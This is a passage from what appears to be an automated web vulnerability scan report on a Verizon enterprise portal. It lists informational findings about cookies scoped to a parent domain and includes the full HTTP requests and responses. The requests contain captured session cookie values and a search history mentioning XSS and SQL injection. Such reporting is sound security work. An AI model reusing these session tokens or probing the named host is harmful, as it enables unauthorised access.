ETag: "8ba-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

...[SNIP]...

14.22. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1435
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "59b-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7185
Date: Mon, 05 Sep 2011 22:40:48 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

...[SNIP]...

14.23. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 51
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "33-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


14.24. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 115
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "73-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


14.25. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 117
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "75-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


14.26. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 105
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "69-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7144
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


14.27. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 607
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "25f-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:25:25 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:24 GMT

...[SNIP]...

14.28. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 248
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "f8-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7188
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

...[SNIP]...

14.29. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 334
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14e-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7156
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

...[SNIP]...

14.30. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 810
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "32a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

...[SNIP]...

14.31. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
